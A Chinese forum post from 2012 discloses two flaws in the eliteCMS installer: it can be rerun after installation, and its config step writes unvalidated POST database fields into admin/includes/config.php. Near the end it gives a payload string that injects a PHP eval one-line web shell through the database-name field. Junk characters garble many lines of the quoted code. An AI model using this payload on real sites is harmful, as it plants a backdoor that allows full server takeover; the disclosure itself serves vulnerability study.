eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装2 G% S' Z# a6 v$ |+ y
& H: e# S- C) U1 X1 B4 T% H4 A! o
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php# }' A7 k; X( n9 G
我们来看代码:
6 ~5 B. N6 i2 X8 j* r+ {. w2 K 7 _, h( }* y- j; S+ V- l$ p) ?0 V
...2 S( [$ q1 i4 }+ [4 n
elseif ($_GET['step'] == "4") {
5 y5 S4 b+ `. V+ h# n: t $file = "../admin/includes/config.php";
2 s; t2 y; w; x: t $write = "<?php\n";+ c* G0 [( o7 A7 v) F1 q/ w' I
$write .= "/**\n";
3 {& c6 {+ [- N9 S9 I7 U8 \ $write .= "*\n";
5 O1 Z1 }* y1 m8 D& b" O $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
& c: V T$ J/ i7 R6 j+ f. f) V' u...略...
: }! ^5 u$ K7 b; R. B1 R2 a, j8 E* } $write .= "*\n";
0 ]: o9 Y6 g4 b% [) `% F& J $write .= "*/\n";$ e( P! O0 d: P4 k0 o6 R/ `
$write .= "\n";9 E9 l: f' U4 o0 c: e- Q5 l, w7 {
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";& Z& V, B# Z0 Q5 j+ X* K) d6 d
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";- S4 q7 c/ [# U+ V0 Y7 Y1 A
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
" B4 j, n' R5 o+ z& l1 o $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
t( V6 [6 b1 C/ J: i/ N) r $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
, X6 A$ k* g4 P5 e y5 ~0 J) o $write .= "if (!\$connection) {\n";2 E% l9 j' [0 X; ]* [$ t
$write .= " die(\"Database connection failed\" .mysql_error());\n";
2 c. G- T5 v% J* B5 A ~8 U $write .= " \n";
" b: O1 K* W6 p1 u# { $write .= "} \n";& i' x" H9 i- \' y2 R' s
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
. u- f0 L3 J' k% M! T" r7 c $write .= "if (!\$db_select) {\n";# S8 X( B' Q9 v
$write .= " die(\"Database select failed\" .mysql_error());\n";
" I+ k% i7 x4 |0 z% t $write .= " \n";
$ O: O! d. z0 y }9 i $write .= "} \n";
, j" Q7 u C( K) R# M) V1 a $write .= "?>\n";8 n: `0 T" A a4 x
4 Z/ p0 L" b' m& D. M: j $writer = fopen($file, 'w');$ l3 x& E1 J/ E: P) m7 N! r
...
% W! s# {6 t4 U- K: }6 g " R3 |9 M% D' ~7 v
在看代码:+ }$ X4 [1 P$ G8 m/ Z D* k
/ I" u1 c! o/ ?0 W* ^! z
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];7 w+ x, ]) Y7 u# \
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];! c7 \, o" c5 _- {& N0 |; Z8 L; {
$_SESSION['DB_USER'] = $_POST['DB_USER'];" p2 R1 ?0 ?6 l6 r
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];# F' _- Q: \1 B0 J) [: \
: \5 w" U1 O! i- K* C2 k' P
取值未作任何验证
- F5 h" h4 c" O3 A如果将数据库名POST数据:: U- b: g9 p6 K+ c' C$ _
6 p2 D* ?8 |! |: K& k( I"?><?php eval($_POST[c]);?><?php- C; v3 U2 g) a# B; \
# v' Z/ r3 J' j+ t3 Y
将导致一句话后门写入/admin/includes/config.php/ Z( M' m, }: @
|
发表于 2012-11-18 13:59:27
收藏
支持
反对